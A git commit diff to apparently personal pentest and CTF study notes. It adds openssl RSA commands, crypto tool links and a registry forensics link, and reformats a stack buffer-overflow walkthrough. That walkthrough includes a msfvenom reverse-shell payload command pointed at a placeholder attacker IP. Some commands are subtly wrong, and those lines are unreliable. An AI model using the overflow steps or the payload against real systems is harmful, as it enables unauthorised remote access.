added cheat sheet to windows forensics

This commit is contained in:
Stefan Etringer 2023-01-02 20:28:19 +01:00
parent 24937f7d68
commit 9e466f8d43
5 changed files with 58 additions and 2 deletions

View File

@ -21,3 +21,24 @@ openssl pkcs12 -export -out *.pfx -in temp.pem
```sh ```sh
openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
``` ```
## RSA
### Decrypt RSA
* Decrypt a RSA cipher with the private key
```sh
openssl pkeyutl -decrypt -in $CIPHER -out $CLEAR_TEXT -inkey $PRIVATE_KEY
```
* Deprecated version of RSA decryption is the following
```sh
openssl rsautl -decrypt -in $CIPHER -out $CLEAR_TEXT -inkey $PRIVATE_KEY
```
### Encrypt RSA
* Encrypt RSA current and deprecated
```sh
openssl pkeyutl -encrypt -in $CLEAR_TEXT -out $CLEAR_TEXT -pubin -inkey $PRIVATE_KEY
openssl rsautl -encrypt -in $CLEAR_TEXT -out $ENCRYPTED -pubin -inkey $PRIVATE_KEY
```

View File

@ -0,0 +1,6 @@
# Cryptography References
## Tools
* [RsaCtfTool](https://github.com/RsaCtfTool/RsaCtfTool.git)
* [featherduster](https://github.com/nccgroup/featherduster.git)

View File

@ -1,13 +1,16 @@
# Buffer Overflow # Buffer Overflow
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst) * [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
# Usage # Usage
* Fuzz & crash the binary pretty roughly via payload * Fuzz & crash the binary pretty roughly via payload
```sh ```sh
python -c "print('A' * 3000) python -c "print('A' * 3000)
``` ```
## Fuzzing ## Fuzzing
* python 3 * python 3
../fuzzer.py ../fuzzer.py
@ -15,18 +18,33 @@ python -c "print('A' * 3000)
../fuzzer2.py ../fuzzer2.py
## Measure Offset ## Measure Offset
### Metasploit
* Use as payload * Use as payload
```sh ```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength> /opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
``` ```
* Find content of the payload at EIP and identify exact bufferlength * Find content of the payload at EIP and identify exact bufferlength
```sh ```sh
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content> /opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
``` ```
### Gef
```sh
file <filename>
pattern create
pattern search <Pattern found in $rbx>
``` ```
### Infinity Debugger
```sh
msf-pattern_offset -l <bufferlength> -q <EIP> msf-pattern_offset -l <bufferlength> -q <EIP>
``` ```
```
```sh
mona msfpattern -l <bufferlength> mona msfpattern -l <bufferlength>
``` ```
* Fill offset variable in exploit `buffer_overflow.py` * Fill offset variable in exploit `buffer_overflow.py`
@ -35,6 +53,7 @@ mona msfpattern -l <bufferlength>
* Execute buffer_overflow.py, EIP should contain `BBBB` * Execute buffer_overflow.py, EIP should contain `BBBB`
## Find bad characters to input in the buffer ## Find bad characters to input in the buffer
* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`. * Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
../bad_chars.py ../bad_chars.py
@ -45,9 +64,11 @@ mona msfpattern -l <bufferlength>
``` ```
## Find Jump Point / RoP ## Find Jump Point / RoP
* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP` * Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
### Example: Immunity Debugger using mona on windows machine ### Example: Immunity Debugger using mona on windows machine
```sh ```sh
!mona modules !mona modules
``` ```
@ -57,6 +78,7 @@ mona msfpattern -l <bufferlength>
* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64 * The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
## Shellcode as Payload ## Shellcode as Payload
* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py` * Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
```sh ```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00" msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"

View File

@ -18,6 +18,11 @@
* [ropstar](https://github.com/xct/ropstar.git) * [ropstar](https://github.com/xct/ropstar.git)
## Cryptography
* [RsaCtfTool](https://github.com/RsaCtfTool/RsaCtfTool.git)
* [featherduster](https://github.com/nccgroup/featherduster.git)
## Windows ## Windows
* [crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec.git) * [crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec.git)

View File

@ -1,11 +1,13 @@
# Windows Registry # Windows Registry
* [Windows Forensics Cheat Sheet](https://user-images.githubusercontent.com/58165365/157232143-3c8785ec-164b-4843-bde8-9d9a22350159.png)
## Regedit Keys ## Regedit Keys
* HKEY_CURRENT_USER (HKCU), inside HKU * HKEY_CURRENT_USER (HKCU), inside HKU
* HKEY_USERS (HKU) * HKEY_USERS (HKU)
* HKEY_LOCAL_MACHINE (HKLM) * HKEY_LOCAL_MACHINE (HKLM)
* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU * HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
* `HKEY_CURREN_USER\Software\Classes` for settings of interactive user * `HKEY_CURRENT_USER\Software\Classes` for settings of interactive user
* `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings * `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
* HKEY_CURRENT_CONFIG * HKEY_CURRENT_CONFIG